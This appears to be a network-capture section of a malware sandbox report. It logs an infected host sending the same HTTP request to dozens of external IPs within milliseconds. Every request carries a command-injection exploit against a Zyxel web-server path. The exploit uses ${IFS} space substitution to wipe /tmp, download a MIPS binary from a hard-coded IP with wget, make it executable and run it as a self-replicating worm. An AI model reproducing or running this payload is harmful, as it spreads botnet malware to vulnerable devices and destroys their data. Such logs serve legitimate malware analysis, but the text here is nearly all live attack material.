                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469088078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8999192.168.2.1337280223.227.49.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469121933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9000192.168.2.1347794192.73.63.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469189882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9001192.168.2.1352738180.199.111.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469260931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9002192.168.2.1337242217.53.167.177443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469290972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9003192.168.2.135790497.33.147.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469335079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9004192.168.2.133753258.6.241.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469398022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9005192.168.2.1332940120.123.10.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469455004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9006192.168.2.134934646.83.247.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469527960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9007192.168.2.1360398193.236.253.200443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469571114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9008192.168.2.1356212101.192.42.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469609976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9009192.168.2.133745876.25.207.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469687939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9010192.168.2.134222446.100.219.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469739914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9011192.168.2.135939494.176.130.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469789982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9012192.168.2.135151852.243.249.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469855070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9013192.168.2.134963639.182.195.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469912052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9014192.168.2.133579058.213.115.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469963074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9015192.168.2.1337214168.195.6.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.469990015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9016192.168.2.133977291.160.193.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470067978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9017192.168.2.134096432.60.241.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470124006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9018192.168.2.134446814.64.153.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470174074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9019192.168.2.1333982175.62.217.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470248938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9020192.168.2.135267488.76.63.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470299959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9021192.168.2.135620088.229.66.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470375061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9022192.168.2.135030250.128.45.206443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470423937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9023192.168.2.1337082183.239.210.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470503092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9024192.168.2.1339310195.4.110.138443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470530987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9025192.168.2.135202095.166.42.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470633030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9026192.168.2.135964425.235.212.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470654964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9027192.168.2.13335508.173.1.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470694065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9028192.168.2.1348738197.198.184.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470763922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9029192.168.2.1354802104.238.125.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470822096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9030192.168.2.1348496216.141.27.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470860004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9031192.168.2.1350216149.253.201.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470922947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9032192.168.2.1344140140.238.146.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.470966101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9033192.168.2.134134259.32.7.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471014023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9034192.168.2.1352088218.59.149.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471071959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9035192.168.2.134145676.142.159.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471129894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9036192.168.2.1343088210.73.68.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471169949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9037192.168.2.134517697.169.40.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471201897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9038192.168.2.1341532210.106.184.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471302986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9039192.168.2.135572654.50.22.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471342087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9040192.168.2.1357460156.177.35.38443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471393108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9041192.168.2.1337094128.230.79.18443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471446037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9042192.168.2.135191870.134.116.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471518040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9043192.168.2.1360142205.19.251.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471549034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9044192.168.2.134877690.46.190.50443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471602917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9045192.168.2.134861014.14.26.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471677065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9046192.168.2.1352538210.72.208.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471704960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9047192.168.2.1351440109.145.202.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471745968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9048192.168.2.1338026205.30.224.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471796989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9049192.168.2.134627289.202.9.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471868992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9050192.168.2.1339970195.17.206.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471903086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9051192.168.2.1354580189.232.177.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.471963882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9052192.168.2.135923238.88.8.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472037077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9053192.168.2.1333482191.88.229.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472073078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9054192.168.2.134848242.229.175.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472117901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9055192.168.2.134249680.166.224.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472177029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9056192.168.2.1342918125.167.115.170443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472239017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9057192.168.2.135010267.143.15.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472311974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9058192.168.2.1336204167.196.251.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472356081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9059192.168.2.1339966210.56.34.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472415924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9060192.168.2.1342264185.164.124.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472448111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9061192.168.2.1359996196.104.99.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472515106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9062192.168.2.1356316222.225.245.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472570896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9063192.168.2.1332956220.80.235.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472623110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9064192.168.2.134225824.224.186.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472672939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9065192.168.2.134972875.150.251.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472732067 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9066192.168.2.133947225.11.156.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:16.472769022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9067192.168.2.1343090195.129.120.219443
                              TimestampBytes transferredDirectionData
